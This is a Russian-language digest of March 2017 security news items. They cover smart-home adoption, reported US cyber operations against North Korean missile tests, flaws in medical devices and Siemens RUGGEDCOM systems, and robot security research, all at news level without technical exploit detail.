В online-опросе Gartner, проведенном во втором полугодии 2016 года, приняли участие порядка 10 тыс. жителей Великобритании, США и Австралии. Согласно результатам исследования, пользователи пока еще не спешат обзаводиться «умными» домами. Большинство участников опроса не считают необходимым приобретать IoT-устройства, несмотря на их очевидную пользу.

Три четверти респондентов предпочитают самостоятельно регулировать температуру и освещение в своих домах, и только четверть опрошенных привлекает идея «умных» гаджетов, способных предугадывать их пожелания и автоматически устанавливать соответствующие настройки.

18% участников опроса используют «умные» системы сигнализации (самый популярный IoT-продукт на сегодняшний день, по результатам исследования Gartner), автоматически оповещающие охранные фирмы о подозрительной активности. В домах 11% респондентов установлена сигнализация, оповещающая о подозрительной активности самих домовладельцев. 9% используют системы домашней автоматизации для управления освещением и отоплением.


Источник: Новости - SecurityLab.ru

05 марта 2017

Американские хакеры срывали испытания баллистических ракет КНДР

Администрация экс-президента США Барака Обамы неоднократно атаковала компьютерные системы КНДР, чтобы срывать испытания Пхеньяном баллистических ракет. Об этом сообщила газета The New York Times.

По ее данным, Обама в 2014 году отдал приказ Пентагону усилить кибератаки в отношении КНДР. После этого Пхеньян стал испытывать значительные трудности при тестировании ракет, которые все чаще стали взрываться в воздухе или же отклоняться от курса. В итоге доля неудачных ракетных испытаний составила 88 процентов, пишет издание.

При этом отмечается, что нет достаточных данных, которые бы свидетельствовали, что неудачи КНДР были связаны именно с хакерской активностью США. А нынешние и бывшие представители оборонного ведомства утверждают, Вашингтон до сих пор не способен противодействовать развитию ядерной и ракетной программ Пхеньяна, передает vesti.ru.

Ранее газета The Wall Street Journal со ссылкой на свои источники сообщала, что администрация Трампа изучает, какие шаги ей следует предпринять в отношении Пхеньяна, не исключая при этом применения против КНДР военной силы.


Источник: Новости информационной безопасности - Anti-Malware.ru

03 марта 2017

Уязвимости в «умных» медицинских приборах несут двойную угрозу

Устройства «Интернета вещей» (IoT) и в частности «умные» медицинские приборы вызывают большое беспокойство у экспертов в области безопасности. К примеру, в прошлом году были обнаружены уязвимости в инсулиновых помпах Johnson & Johnson и кардиостимуляторах St. Jude Medical, позволяющие осуществлять хакерские атаки. Казалось бы, производители «умных» медицинских устройств должны были пересмотреть свои политики безопасности, однако они не спешат что-либо менять.

Уязвимости в подключенном к Сети медицинском оборудовании таят двойную угрозу. Во-первых, злоумышленники могут взломать прибор и причинить вред пациенту (например, увеличить дозу препарата в инсулиновой помпе). Во-вторых, «дыра» в безопасности может стать отличной точной входа для проникновения в целую сеть медучреждения. Получив доступ к сети, злоумышленник может похитить конфиденциальную информацию или с помощью вымогательского ПО заблокировать работу систем и требовать выкуп за ее восстановление.

По данным Trend Micro, только в США через поисковик Shodan можно найти порядка 36 тыс. подключенных к интернету медицинских устройств. Многие из них используют устаревшие операционные системы. Более 3% приборов по-прежнему работают под управлением больше неподдерживаемой Windows XP, что облегчает хакерам задачу.


Источник: Новости - SecurityLab.ru

NMS RUGGEDCOM от Siemens уязвимы к CSRF и XSS

Системы управления корпоративной сетью (NMS), производимые Siemens, страдают от уязвимостей, позволяющих сторонним пользователям осуществлять администрирование.

В NMS-продуктах линейки RUGGEDCOM обнаружены два бага, открывающие возможность для подделки межсайтовых запросов (CSRF) и для межсайтового скриптинга (XSS). Группа быстрого реагирования на киберинциденты в сфере управления производственными процессами (ICS-CERT), работающая под эгидой министерства внутренней безопасности США, во вторник выпустила информационный бюллетень, в котором предупредила, что обе уязвимости допускают удаленный эксплойт, притом их использование не требует особых технических навыков.

NMS-системы Siemens используются по всему миру для мониторинга и управления сетями, преимущественно в таких отраслях, как энергетика, здравоохранение и транспорт. Согласно бюллетеню ICS-CERT, уязвимостям подвержены все версии станций RUGGEDCOM, работающих под Windows и Linux.

Баг CSRF более опасен, он оценен в 8,8 балла по шкале CVSS. Эксплойт в данном случае может повлечь непосредственное исполнение «административных операций», если жертва инициировала сессию и ее удастся склонить к подаче вредоносного запроса. Уязвимость XSS получила 6,3 балла по шкале CVSS, хотя ее эксплуатация позволяет непривилегированному пользователю «получить административные разрешения».

Разработчик призывает пользователей RUGGEDCOM произвести обновление до версии 2.1.0, содержащей патчи.

В текущем году ICS-CERT уже второй раз выпускает бюллетень, посвященный продуктам Siemens. В середине февраля эксперты предупредили владельцев устройств, использующих ПО SIMATIC Logon этой компании, о наличии уязвимости, эксплуатация которой позволяет обойти аутентификацию на уровне приложения. Проблема была решена в новом выпуске SIMATIC Logon.


Источник: Threatpost | Новости информационной безопасности

[ZLONOV.ru] Как настроить свой личный VPN-сервер за час-другой?

ZLONOV.ru
Пост Как настроить свой личный VPN-сервер за час-другой? опубликован на сайте ZLONOV.ru


Вы можете подписаться на обновления напрямую: RSS-лента
Презентации и документы: SlideShare
Ссылка на Twitter: @zlonov

02 марта 2017

Роботы представляют не меньшую угрозу, чем IoT

Используемые в быту и на производстве роботы имеют те же распространенные проблемы с безопасностью, что и устройства «Интернета вещей» (IoT). К такому заключению пришли эксперты компании IOActive на основании анализа мобильных приложений, операционных систем, образов прошивок и другого ПО, используемого в бытовых и промышленных роботах от различных производителей.

По словам исследователей, робот представляет собой IoT-устройство, но только с руками, ногами, колесами и способное двигаться. Взломанный злоумышленником он способен превратиться в угрозу невиданных ранее масштабов. «По мере развития способов взаимодействия между роботом и человеком появляются новые векторы и сценарии атак», - пояснили Цезарь Керрудо (Cesar Cerrudo) и Лукас Апа (Lucas Apa) из IOActive.

В ходе исследования эксперты проанализировали ПО таких роботов, как NAO и Pepper производства SoftBank Robotics, Alpha 1S и Alpha 2 от компании UBTECH Robotics, ROBOTIS OP2 и THORMANG3 от ROBOTIS, UR3, UR5 и UR10 от Universal Robots, Baxter и Sawyer от Rethink Robotics, а также несколько моделей, где используется разработанная компанией Asratec технология управления V-Sido.

Как обнаружилось в ходе исследования, подключение большинства роботов является незащищенным. Кроме того, у многих моделей есть проблемы с аутентификацией и отсутствуют механизмы авторизации. Во многих роботах используются уязвимые библиотеки с открытым исходным кодом и слабое шифрование (в некоторых оно и вовсе отсутствует), а конфигурации по умолчанию являются ненадежными и могут привести к утечке данных.

Управление некоторыми моделями осуществляется с мобильных приложений или с помощью ПК. Другие роботы подключаются к облачным сервисам для получения обновлений. Если подключение между различными компонентами является незащищенным, злоумышленник может осуществить атаку «человек посередине» и отправить роботу вредоносную команду или обновление.


Источник: Новости - SecurityLab.ru